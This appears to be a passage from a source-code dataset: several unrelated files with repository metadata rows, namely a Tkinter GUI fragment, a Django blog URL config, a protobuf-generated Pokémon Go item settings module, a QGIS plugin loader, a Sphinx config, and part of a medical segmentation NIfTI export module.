database.update(self.selected_tuple[0],self.title_text.get(), self.author_text.get(), self.year_text.get(), self.ISBN_text.get())
self.view_command()
#code for the GUI (front end)
window = Tk()
window.geometry("580x240")
Window(window)
window.mainloop()
|
[
"[email protected]"
] | |
66c6fd7546d0d7ae63a823f1182cfd17e3f29d36
|
24ff40115475130039eb42c180932fb17feb8f42
|
/mysite/blog/urls.py
|
8632bb94424bb026d765670ddfdabc382f4cbac1
|
[] |
no_license
|
ushnuel/blog_project
|
1bac23a033ab0d1bd38e034819b2f88b52390640
|
0816269fefa45c641d2c8413acbcd32b80972651
|
refs/heads/master
| 2020-05-18T23:41:25.082360 | 2019-05-03T06:54:17 | 2019-05-03T06:54:17 | 184,717,708 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 973 |
py
|
from django.conf.urls import url
from blog import views
urlpatterns = [
url(r'^$', views.PostListView.as_view(), name='post_list'),
url(r'^about/$', views.AboutView.as_view(), name='about'),
url(r'^post/(?P<pk>\d+)$', views.PostDetailView.as_view(), name='post_detail'),
url(r'^post/new/$', views.PostCreateView.as_view(), name='post_new'),
url(r'^post/(?P<pk>\d+)/edit/$', views.PostUpdateView.as_view(), name='post_update'),
url(r'^post/(?P<pk>\d+)/delete/$', views.PostDeleteView.as_view(), name='post_delete'),
url(r'^drafts/$',views.DraftListView.as_view(), name='post_draft_list'),
url(r'^post/(?P<pk>\d+)/comment/$', views.add_comment_to_post, name='add_comment_to_post'),
    url(r'^comment/(?P<pk>\d+)/approve/$', views.approve_comment, name='approve_comment'),
    url(r'^comment/(?P<pk>\d+)/remove/$', views.comment_remove, name='comment_remove'),
    url(r'^post/(?P<pk>\d+)/publish/$', views.post_publish, name='post_publish'),
]
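# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original file): resolving these named
# routes instead of hard-coding paths. The pk value and the assumption that
# this urlconf is included at the site root are illustrative only.
#
# from django.urls import reverse
# reverse('post_detail', kwargs={'pk': 42})          # -> '/post/42'
# reverse('add_comment_to_post', kwargs={'pk': 42})  # -> '/post/42/comment/'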
|
[
"[email protected]"
] | |
1c795934bcbbc615b180f995d41268c824795d6a
|
9d8f1868aa61ff4f4947d98c8fea905c71dee6b7
|
/pgoapi/protos/POGOProtos/Settings/Master/ItemSettings_pb2.py
|
dba8f747c61a7af895af2a2a0abcf3a31087dd73
|
[
"MIT"
] |
permissive
|
erhan-/pokefarm
|
5c3a30a5708417ef68c0537ff879d472fb62d774
|
797ad72d44bdccd2b7a32080d259d187988bd4ab
|
refs/heads/master
| 2023-05-24T06:50:52.169989 | 2021-03-12T12:34:25 | 2021-03-12T12:34:25 | 63,973,073 | 0 | 0 |
NOASSERTION
| 2023-05-22T21:40:56 | 2016-07-22T17:59:20 |
Python
|
UTF-8
|
Python
| false | true | 13,742 |
py
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Settings/Master/ItemSettings.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos.Enums import ItemCategory_pb2 as POGOProtos_dot_Enums_dot_ItemCategory__pb2
from POGOProtos.Inventory import ItemId_pb2 as POGOProtos_dot_Inventory_dot_ItemId__pb2
from POGOProtos.Inventory import ItemType_pb2 as POGOProtos_dot_Inventory_dot_ItemType__pb2
from POGOProtos.Settings.Master.Item import FoodAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FoodAttributes__pb2
from POGOProtos.Settings.Master.Item import PotionAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PotionAttributes__pb2
from POGOProtos.Settings.Master.Item import ReviveAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ReviveAttributes__pb2
from POGOProtos.Settings.Master.Item import BattleAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_BattleAttributes__pb2
from POGOProtos.Settings.Master.Item import IncenseAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_IncenseAttributes__pb2
from POGOProtos.Settings.Master.Item import PokeballAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PokeballAttributes__pb2
from POGOProtos.Settings.Master.Item import FortModifierAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FortModifierAttributes__pb2
from POGOProtos.Settings.Master.Item import EggIncubatorAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_EggIncubatorAttributes__pb2
from POGOProtos.Settings.Master.Item import ExperienceBoostAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ExperienceBoostAttributes__pb2
from POGOProtos.Settings.Master.Item import InventoryUpgradeAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_InventoryUpgradeAttributes__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Settings/Master/ItemSettings.proto',
package='POGOProtos.Settings.Master',
syntax='proto3',
serialized_pb=_b('\n-POGOProtos/Settings/Master/ItemSettings.proto\x12\x1aPOGOProtos.Settings.Master\x1a#POGOProtos/Enums/ItemCategory.proto\x1a!POGOProtos/Inventory/ItemId.proto\x1a#POGOProtos/Inventory/ItemType.proto\x1a\x34POGOProtos/Settings/Master/Item/FoodAttributes.proto\x1a\x36POGOProtos/Settings/Master/Item/PotionAttributes.proto\x1a\x36POGOProtos/Settings/Master/Item/ReviveAttributes.proto\x1a\x36POGOProtos/Settings/Master/Item/BattleAttributes.proto\x1a\x37POGOProtos/Settings/Master/Item/IncenseAttributes.proto\x1a\x38POGOProtos/Settings/Master/Item/PokeballAttributes.proto\x1a<POGOProtos/Settings/Master/Item/FortModifierAttributes.proto\x1a<POGOProtos/Settings/Master/Item/EggIncubatorAttributes.proto\x1a?POGOProtos/Settings/Master/Item/ExperienceBoostAttributes.proto\x1a@POGOProtos/Settings/Master/Item/InventoryUpgradeAttributes.proto\"\xab\x07\n\x0cItemSettings\x12-\n\x07item_id\x18\x01 \x01(\x0e\x32\x1c.POGOProtos.Inventory.ItemId\x12\x31\n\titem_type\x18\x02 \x01(\x0e\x32\x1e.POGOProtos.Inventory.ItemType\x12\x30\n\x08\x63\x61tegory\x18\x03 \x01(\x0e\x32\x1e.POGOProtos.Enums.ItemCategory\x12\x11\n\tdrop_freq\x18\x04 \x01(\x02\x12\x1a\n\x12\x64rop_trainer_level\x18\x05 \x01(\x05\x12\x45\n\x08pokeball\x18\x06 \x01(\x0b\x32\x33.POGOProtos.Settings.Master.Item.PokeballAttributes\x12\x41\n\x06potion\x18\x07 \x01(\x0b\x32\x31.POGOProtos.Settings.Master.Item.PotionAttributes\x12\x41\n\x06revive\x18\x08 \x01(\x0b\x32\x31.POGOProtos.Settings.Master.Item.ReviveAttributes\x12\x41\n\x06\x62\x61ttle\x18\t \x01(\x0b\x32\x31.POGOProtos.Settings.Master.Item.BattleAttributes\x12=\n\x04\x66ood\x18\n \x01(\x0b\x32/.POGOProtos.Settings.Master.Item.FoodAttributes\x12V\n\x11inventory_upgrade\x18\x0b \x01(\x0b\x32;.POGOProtos.Settings.Master.Item.InventoryUpgradeAttributes\x12L\n\x08xp_boost\x18\x0c \x01(\x0b\x32:.POGOProtos.Settings.Master.Item.ExperienceBoostAttributes\x12\x43\n\x07incense\x18\r \x01(\x0b\x32\x32.POGOProtos.Settings.Master.Item.IncenseAttributes\x12N\n\regg_incubator\x18\x0e \x01(\x0b\x32\x37.POGOProtos.Settings.Master.Item.EggIncubatorAttributes\x12N\n\rfort_modifier\x18\x0f \x01(\x0b\x32\x37.POGOProtos.Settings.Master.Item.FortModifierAttributesb\x06proto3')
,
dependencies=[POGOProtos_dot_Enums_dot_ItemCategory__pb2.DESCRIPTOR,POGOProtos_dot_Inventory_dot_ItemId__pb2.DESCRIPTOR,POGOProtos_dot_Inventory_dot_ItemType__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FoodAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PotionAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ReviveAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_BattleAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_IncenseAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PokeballAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FortModifierAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_EggIncubatorAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ExperienceBoostAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_InventoryUpgradeAttributes__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_ITEMSETTINGS = _descriptor.Descriptor(
name='ItemSettings',
full_name='POGOProtos.Settings.Master.ItemSettings',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='item_id', full_name='POGOProtos.Settings.Master.ItemSettings.item_id', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='item_type', full_name='POGOProtos.Settings.Master.ItemSettings.item_type', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='category', full_name='POGOProtos.Settings.Master.ItemSettings.category', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='drop_freq', full_name='POGOProtos.Settings.Master.ItemSettings.drop_freq', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='drop_trainer_level', full_name='POGOProtos.Settings.Master.ItemSettings.drop_trainer_level', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pokeball', full_name='POGOProtos.Settings.Master.ItemSettings.pokeball', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='potion', full_name='POGOProtos.Settings.Master.ItemSettings.potion', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='revive', full_name='POGOProtos.Settings.Master.ItemSettings.revive', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='battle', full_name='POGOProtos.Settings.Master.ItemSettings.battle', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='food', full_name='POGOProtos.Settings.Master.ItemSettings.food', index=9,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='inventory_upgrade', full_name='POGOProtos.Settings.Master.ItemSettings.inventory_upgrade', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='xp_boost', full_name='POGOProtos.Settings.Master.ItemSettings.xp_boost', index=11,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='incense', full_name='POGOProtos.Settings.Master.ItemSettings.incense', index=12,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='egg_incubator', full_name='POGOProtos.Settings.Master.ItemSettings.egg_incubator', index=13,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='fort_modifier', full_name='POGOProtos.Settings.Master.ItemSettings.fort_modifier', index=14,
number=15, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=779,
serialized_end=1718,
)
_ITEMSETTINGS.fields_by_name['item_id'].enum_type = POGOProtos_dot_Inventory_dot_ItemId__pb2._ITEMID
_ITEMSETTINGS.fields_by_name['item_type'].enum_type = POGOProtos_dot_Inventory_dot_ItemType__pb2._ITEMTYPE
_ITEMSETTINGS.fields_by_name['category'].enum_type = POGOProtos_dot_Enums_dot_ItemCategory__pb2._ITEMCATEGORY
_ITEMSETTINGS.fields_by_name['pokeball'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PokeballAttributes__pb2._POKEBALLATTRIBUTES
_ITEMSETTINGS.fields_by_name['potion'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PotionAttributes__pb2._POTIONATTRIBUTES
_ITEMSETTINGS.fields_by_name['revive'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ReviveAttributes__pb2._REVIVEATTRIBUTES
_ITEMSETTINGS.fields_by_name['battle'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_BattleAttributes__pb2._BATTLEATTRIBUTES
_ITEMSETTINGS.fields_by_name['food'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FoodAttributes__pb2._FOODATTRIBUTES
_ITEMSETTINGS.fields_by_name['inventory_upgrade'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_InventoryUpgradeAttributes__pb2._INVENTORYUPGRADEATTRIBUTES
_ITEMSETTINGS.fields_by_name['xp_boost'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ExperienceBoostAttributes__pb2._EXPERIENCEBOOSTATTRIBUTES
_ITEMSETTINGS.fields_by_name['incense'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_IncenseAttributes__pb2._INCENSEATTRIBUTES
_ITEMSETTINGS.fields_by_name['egg_incubator'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_EggIncubatorAttributes__pb2._EGGINCUBATORATTRIBUTES
_ITEMSETTINGS.fields_by_name['fort_modifier'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FortModifierAttributes__pb2._FORTMODIFIERATTRIBUTES
DESCRIPTOR.message_types_by_name['ItemSettings'] = _ITEMSETTINGS
ItemSettings = _reflection.GeneratedProtocolMessageType('ItemSettings', (_message.Message,), dict(
DESCRIPTOR = _ITEMSETTINGS,
__module__ = 'POGOProtos.Settings.Master.ItemSettings_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Settings.Master.ItemSettings)
))
_sym_db.RegisterMessage(ItemSettings)
# @@protoc_insertion_point(module_scope)
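# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the generated file, which must never be
# edited by hand): building and round-tripping an ItemSettings message with
# the standard protobuf Python API. The field values are illustrative only.
#
# from POGOProtos.Settings.Master import ItemSettings_pb2
# settings = ItemSettings_pb2.ItemSettings()
# settings.drop_freq = 0.25
# settings.drop_trainer_level = 5
# payload = settings.SerializeToString()   # bytes for the wire
# clone = ItemSettings_pb2.ItemSettings()
# clone.ParseFromString(payload)           # lossless round trip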
|
[
"[email protected]"
] | |
5b72718447dbd4f8681995d28894495e837162ec
|
e6ff97a6d68bc115ea72dd515b84266741f9ea8f
|
/MED/__init__.py
|
1905cc9a6cce245b569d665b2f77c412cab09e86
|
[] |
no_license
|
Elalasota/MED_centrum_miasta
|
3d23f6a12cf98452fb0233bb3657e66075a915ca
|
0cfddc190d2fc21e5c4786cd561bd0f63582b115
|
refs/heads/master
| 2021-01-09T20:40:43.244977 | 2016-05-29T15:59:18 | 2016-05-29T15:59:18 | 59,951,228 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,446 |
py
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
MED
A QGIS plugin
Wyznaczanie centrum miasta
-------------------
begin : 2015-01-18
copyright : (C) 2015 by Ela Lasota
email : [email protected]
git sha : $Format:%H$
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
This script initializes the plugin, making it known to QGIS.
"""
# noinspection PyPep8Naming
def classFactory(iface): # pylint: disable=invalid-name
"""Load MED class from file MED.
:param iface: A QGIS interface instance.
:type iface: QgsInterface
"""
    from .MED import MED
    return MED(iface)
|
[
"[email protected]"
] | |
5208b205cc65d2ed82f647b36279db82db70b513
|
5005140cc0c9a2247c3cfcc2bfa12d19472f6a9c
|
/doc/conf.py
|
026db6e72d4714ea7f2753238a5c9427aaa28b69
|
[
"WTFPL"
] |
permissive
|
cristoper/feedmixer
|
07a1cbb116eca1189c1e917f8a08ab17cdc44059
|
70bb0da59ad2a9869ff007f703eda3cafe8dcaaa
|
refs/heads/master
| 2023-08-08T03:04:49.504375 | 2023-07-25T23:13:09 | 2023-07-25T23:13:09 | 88,230,593 | 124 | 12 |
WTFPL
| 2023-07-25T23:13:10 | 2017-04-14T03:45:38 |
Python
|
UTF-8
|
Python
| false | false | 4,909 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# feedmixer documentation build configuration file, created by
# sphinx-quickstart on Thu Apr 13 15:29:09 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
autoclass_content = 'both'
autodoc_member_order = 'bysource'
default_role = 'any'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode',
'sphinx.ext.napoleon', 'sphinx_autodoc_annotation']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'feedmixer'
copyright = '2017, chris b'
author = 'chris b'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'feedmixerdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'feedmixer.tex', 'feedmixer Documentation',
'chris b', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'feedmixer', 'feedmixer Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'feedmixer', 'feedmixer Documentation',
author, 'feedmixer', 'One line description of project.',
'Miscellaneous'),
]
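# ---------------------------------------------------------------------------
# Hedged usage note (not part of the original conf.py): with this layout the
# HTML docs are typically built from the project root; the output directory
# name is an assumption.
#
#     sphinx-build -b html doc doc/_build/html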
|
[
"[email protected]"
] | |
1954e1d277622077bd20c0d616dc58a3d5b3662f
|
0bd7a6bef178bb93b2c3fb19e789c7e3b364e6d1
|
/simple_frame/inference/segmentation_export.py
|
ea4b06435005677303a2da54ba9827504d7de7c2
|
[] |
no_license
|
Magnety/Simple_Frame_linux
|
090e07491e170314718c9ba5f2da2a4393bdb1ad
|
7e1ef5d11e3baa8784fd9b6bbf81b0d954dd1ca6
|
refs/heads/main
| 2023-06-02T09:35:36.023461 | 2021-06-17T09:23:01 | 2021-06-17T09:23:01 | 371,412,450 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 11,716 |
py
|
# Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from copy import deepcopy
from typing import Union, Tuple
import numpy as np
import SimpleITK as sitk
from batchgenerators.augmentations.utils import resize_segmentation
from simple_frame.preprocessing.preprocessing import get_lowres_axis, get_do_separate_z, resample_data_or_seg
from batchgenerators.utilities.file_and_folder_operations import *
def save_segmentation_nifti_from_softmax(segmentation_softmax: Union[str, np.ndarray], out_fname: str,
properties_dict: dict, order: int = 1,
region_class_order: Tuple[Tuple[int]] = None,
seg_postprogess_fn: callable = None, seg_postprocess_args: tuple = None,
resampled_npz_fname: str = None,
non_postprocessed_fname: str = None, force_separate_z: bool = None,
interpolation_order_z: int = 0, verbose: bool = True):
"""
    This is a utility for writing segmentations to nifti and npz. It requires the data to have been preprocessed by
GenericPreprocessor because it depends on the property dictionary output (dct) to know the geometry of the original
data. segmentation_softmax does not have to have the same size in pixels as the original data, it will be
resampled to match that. This is generally useful because the spacings our networks operate on are most of the time
not the native spacings of the image data.
    If seg_postprogess_fn is not None then seg_postprogess_fn(segmentation, *seg_postprocess_args)
    will be called before nifti export
    There is a problem with python process communication that prevents us from communicating objects
    larger than 2 GB between processes (basically, when the length of the pickle string that will be sent is
    communicated by the multiprocessing.Pipe object, the placeholder (%i, I think) does not allow for long
    enough strings). This could be fixed by changing i to l (for long) but that would require manually
    patching system python code. We circumvent that problem here by saving softmax_pred to a npy file that will
then be read (and finally deleted) by the Process. save_segmentation_nifti_from_softmax can take either
filename or np.ndarray for segmentation_softmax and will handle this automatically
:param segmentation_softmax:
:param out_fname:
:param properties_dict:
:param order:
:param region_class_order:
:param seg_postprogess_fn:
:param seg_postprocess_args:
:param resampled_npz_fname:
:param non_postprocessed_fname:
:param force_separate_z: if None then we dynamically decide how to resample along z, if True/False then always
/never resample along z separately. Do not touch unless you know what you are doing
:param interpolation_order_z: if separate z resampling is done then this is the order for resampling in z
:param verbose:
:return:
"""
if verbose: print("force_separate_z:", force_separate_z, "interpolation order:", order)
if isinstance(segmentation_softmax, str):
assert isfile(segmentation_softmax), "If isinstance(segmentation_softmax, str) then " \
"isfile(segmentation_softmax) must be True"
del_file = deepcopy(segmentation_softmax)
segmentation_softmax = np.load(segmentation_softmax)
os.remove(del_file)
# first resample, then put result into bbox of cropping, then save
current_shape = segmentation_softmax.shape
shape_original_after_cropping = properties_dict.get('size_after_cropping')
shape_original_before_cropping = properties_dict.get('original_size_of_raw_data')
# current_spacing = dct.get('spacing_after_resampling')
# original_spacing = dct.get('original_spacing')
if np.any([i != j for i, j in zip(np.array(current_shape[1:]), np.array(shape_original_after_cropping))]):
if force_separate_z is None:
if get_do_separate_z(properties_dict.get('original_spacing')):
do_separate_z = True
lowres_axis = get_lowres_axis(properties_dict.get('original_spacing'))
elif get_do_separate_z(properties_dict.get('spacing_after_resampling')):
do_separate_z = True
lowres_axis = get_lowres_axis(properties_dict.get('spacing_after_resampling'))
else:
do_separate_z = False
lowres_axis = None
else:
do_separate_z = force_separate_z
if do_separate_z:
lowres_axis = get_lowres_axis(properties_dict.get('original_spacing'))
else:
lowres_axis = None
if verbose: print("separate z:", do_separate_z, "lowres axis", lowres_axis)
seg_old_spacing = resample_data_or_seg(segmentation_softmax, shape_original_after_cropping, is_seg=False,
axis=lowres_axis, order=order, do_separate_z=do_separate_z, cval=0,
order_z=interpolation_order_z)
# seg_old_spacing = resize_softmax_output(segmentation_softmax, shape_original_after_cropping, order=order)
else:
if verbose: print("no resampling necessary")
seg_old_spacing = segmentation_softmax
if resampled_npz_fname is not None:
np.savez_compressed(resampled_npz_fname, softmax=seg_old_spacing.astype(np.float16))
# this is needed for ensembling if the nonlinearity is sigmoid
if region_class_order is not None:
properties_dict['regions_class_order'] = region_class_order
save_pickle(properties_dict, resampled_npz_fname[:-4] + ".pkl")
if region_class_order is None:
seg_old_spacing = seg_old_spacing.argmax(0)
else:
seg_old_spacing_final = np.zeros(seg_old_spacing.shape[1:])
for i, c in enumerate(region_class_order):
seg_old_spacing_final[seg_old_spacing[i] > 0.5] = c
seg_old_spacing = seg_old_spacing_final
bbox = properties_dict.get('crop_bbox')
if bbox is not None:
seg_old_size = np.zeros(shape_original_before_cropping)
for c in range(3):
bbox[c][1] = np.min((bbox[c][0] + seg_old_spacing.shape[c], shape_original_before_cropping[c]))
seg_old_size[bbox[0][0]:bbox[0][1],
bbox[1][0]:bbox[1][1],
bbox[2][0]:bbox[2][1]] = seg_old_spacing
else:
seg_old_size = seg_old_spacing
if seg_postprogess_fn is not None:
seg_old_size_postprocessed = seg_postprogess_fn(np.copy(seg_old_size), *seg_postprocess_args)
else:
seg_old_size_postprocessed = seg_old_size
seg_resized_itk = sitk.GetImageFromArray(seg_old_size_postprocessed.astype(np.uint8))
seg_resized_itk.SetSpacing(properties_dict['itk_spacing'])
seg_resized_itk.SetOrigin(properties_dict['itk_origin'])
seg_resized_itk.SetDirection(properties_dict['itk_direction'])
sitk.WriteImage(seg_resized_itk, out_fname)
if (non_postprocessed_fname is not None) and (seg_postprogess_fn is not None):
seg_resized_itk = sitk.GetImageFromArray(seg_old_size.astype(np.uint8))
seg_resized_itk.SetSpacing(properties_dict['itk_spacing'])
seg_resized_itk.SetOrigin(properties_dict['itk_origin'])
seg_resized_itk.SetDirection(properties_dict['itk_direction'])
sitk.WriteImage(seg_resized_itk, non_postprocessed_fname)
def save_segmentation_nifti(segmentation, out_fname, dct, order=1, force_separate_z=None, order_z=0):
"""
    faster and uses less RAM than save_segmentation_nifti_from_softmax, but may be less precise and also does not support
softmax export (which is needed for ensembling). So it's a niche function that may be useful in some cases.
:param segmentation:
:param out_fname:
:param dct:
:param order:
:param force_separate_z:
:return:
"""
# suppress output
print("force_separate_z:", force_separate_z, "interpolation order:", order)
sys.stdout = open(os.devnull, 'w')
if isinstance(segmentation, str):
assert isfile(segmentation), "If isinstance(segmentation_softmax, str) then " \
"isfile(segmentation_softmax) must be True"
del_file = deepcopy(segmentation)
segmentation = np.load(segmentation)
os.remove(del_file)
# first resample, then put result into bbox of cropping, then save
current_shape = segmentation.shape
shape_original_after_cropping = dct.get('size_after_cropping')
shape_original_before_cropping = dct.get('original_size_of_raw_data')
# current_spacing = dct.get('spacing_after_resampling')
# original_spacing = dct.get('original_spacing')
